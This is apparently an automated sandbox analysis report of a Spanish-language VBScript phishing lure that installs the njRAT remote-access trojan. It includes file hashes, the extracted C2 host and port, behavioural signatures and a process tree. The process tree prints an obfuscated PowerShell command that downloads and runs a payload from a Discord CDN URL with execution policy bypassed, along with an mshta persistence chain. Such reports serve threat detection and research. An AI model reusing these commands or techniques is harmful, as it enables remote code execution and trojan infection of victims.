Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-09-2021 15:55
Static task
static1
Behavioral task
behavioral1
Sample
Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA.vbs
Resource
win7-en
General
-
Target
Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA.vbs
-
Size
826B
-
MD5
676950cc6c5b064bd1a75cdc8cbf4438
-
SHA1
7deabbeb895a1839b61b1f5a4ddbabbc5ca566b6
-
SHA256
6786d7be736d7131db9aae8c1f51a2f2a86f506cebda18af9cbb8d54e51c7eb3
-
SHA512
8a30e71961e19c033e9bb03f18f891ba4f40fb44d18f55539823f876ee38790ebd21591558e01838dc33f6f4fba405e888b5d14ce2c75104f0782e893d8f45f0
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
yur2021.duckdns.org:2001
0a30571c770d468e
-
reg_key
0a30571c770d468e
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 3884 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3568 set thread context of 420 3568 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3884 powershell.exe 3884 powershell.exe 3884 powershell.exe 3568 powershell.exe 3568 powershell.exe 3568 powershell.exe 3568 powershell.exe 3568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
Processes:
powershell.exepowershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 3884 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe Token: 33 420 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 420 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exeWScript.execmd.exemshta.exepowershell.exedescription pid process target process PID 3932 wrote to memory of 3884 3932 WScript.exe powershell.exe PID 3932 wrote to memory of 3884 3932 WScript.exe powershell.exe PID 3884 wrote to memory of 1788 3884 powershell.exe WScript.exe PID 3884 wrote to memory of 1788 3884 powershell.exe WScript.exe PID 1788 wrote to memory of 2256 1788 WScript.exe cmd.exe PID 1788 wrote to memory of 2256 1788 WScript.exe cmd.exe PID 2256 wrote to memory of 2504 2256 cmd.exe mshta.exe PID 2256 wrote to memory of 2504 2256 cmd.exe mshta.exe PID 2504 wrote to memory of 3568 2504 mshta.exe powershell.exe PID 2504 wrote to memory of 3568 2504 mshta.exe powershell.exe PID 3568 wrote to memory of 3116 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 3116 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 3116 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 420 3568 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/878366592180813876/884445633640034374/jai06.txt');$results2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"3⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")5⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵PID:3116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:420
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
558a8b7b3fdef4ca79110f8cfd126694
SHA1d6e96ca27f701b3f4c24885dacd14c762a9d36b0
SHA25638c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
SHA51237d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
-
MD5
7f85382953fde20b101039d48673dbd2
SHA15ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
SHA256fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
SHA5126e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
-
MD5
c948ef7f14f332e896a21b0fc2900495
SHA16b2215da5418fb744c22d516b5da8e31673da907
SHA25610500d843e7d385ecab54acde0839b090afff19bdcd71a47cb57ca54317c3e05
SHA5120998cf81acbd69c1aeee7c4a7c4c4b125c673734267a3390e91f3a02761565a34e712ba3fff1632bd4a193c9a45283e0c3fa5667e9fa5a0b0ba7ec373b85450a